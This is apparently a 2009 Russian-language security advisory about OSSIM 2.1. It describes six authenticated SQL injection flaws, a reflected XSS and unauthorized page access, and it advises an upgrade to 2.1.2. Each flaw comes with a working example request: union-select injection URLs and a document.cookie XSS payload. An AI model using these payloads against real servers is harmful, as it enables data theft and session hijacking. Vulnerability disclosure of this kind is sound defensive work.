DSECRG-09-055

Вендор

OSSIM

Продукт

OSSIM 2.1, возможно и 2.1.1 

Тип уязвимости

SQL-инъекции, межсайтовый скриптинг, неавторизованный доступ

Reported

07.09.2009

Date of Public Advisory

21.09.2009

Автор

Алексей Синцов

Детальное описание

1.1. SQL-инъекции
********************
Злоумышленник должен быть авторизован в системе.
Уязвимый скрипт- repository_document.php 
Уязвимый параметр - id_document 

Пример 
*********
http://OSSIM-SERVER/ossim/repository/repository_document.php?id_document=-3 
union select 1,2,user(),4,5,6--&maximized=1&search_bylink=&pag=1 

1.2. SQL-инъекции
*********************
Злоумышленник должен быть авторизован в системе 
Уязвимый скриптt - repository_links.php 
Уязвимый параметр- id_document 

Пример 
*********
http://OSSIM-SERVER/ossim/repository/repository_links.php?id_document=-3 
union select 1,user(),3,4,5,6 

1.3. SQL-инъекции
********************
Злоумышленник должен быть авторизован в системе.
Уязвимый скрипт - repository_editdocument.php 
Уязвимый параметр - id_document 

Пример 
*********
http://OSSIM-SERVER/ossim/repository/repository_editdocument.php?id_document=-3 
union select 1,user(),3,4,5,6 

1.4. SQL-инъекции
******************** 
Злоумышленник должен быть авторизован в системе.
Уязвимый скрипт - getpolicy.php 
Уязвимый параметр - group 

Пример 
*********
http://OSSIM-SERVER/ossim/policy/getpolicy.php?group=0 and 1=1 

1.5. SQL-инъекции
********************
Злоумышленник должен быть авторизован в системе.
Уязвимый скрипт - newhostgroupform.php 
Уязвимый параметр- name 

Пример 
*********
http://OSSIM-SERVER/ossim/host/newhostgroupform.php?name=' union select 
user(),'b','c','d','f 

1.6. SQL injection in policy scripts
***********************************
Злоумышленник должен быть авторизован в системе.
Уязвимый скрипт - modifynetform.php 
Уязвимый параметр - name 

Пример 
********** 
http://OSSIM-SERVER/ossim/net/modifynetform.php?name=' union select 
user(),'b','c','d','e','f','g','h','a 

And others scripts in policy menu. 

2. Уязвимости межсайтового скриптинга
*********************************************
Уязвимый скрипт /ossim/ 
Уязвимый параметр - option 

Пример 
**********
http://OSSIM-SERVER/ossim/?option=0" onload=alert(document.cookie) a=" 

3. Неавторизованный доступ
***********************************

Пример 
*********
Доступ к графикам: http://OSSIM-SERVER/ossim/graphs/alarms_events.php 
Доступ к инфраструктуре: http://OSSIM-SERVER/ossim/host/draw_tree.php 

Решение 
***********
Обновить до версии 2.1.2.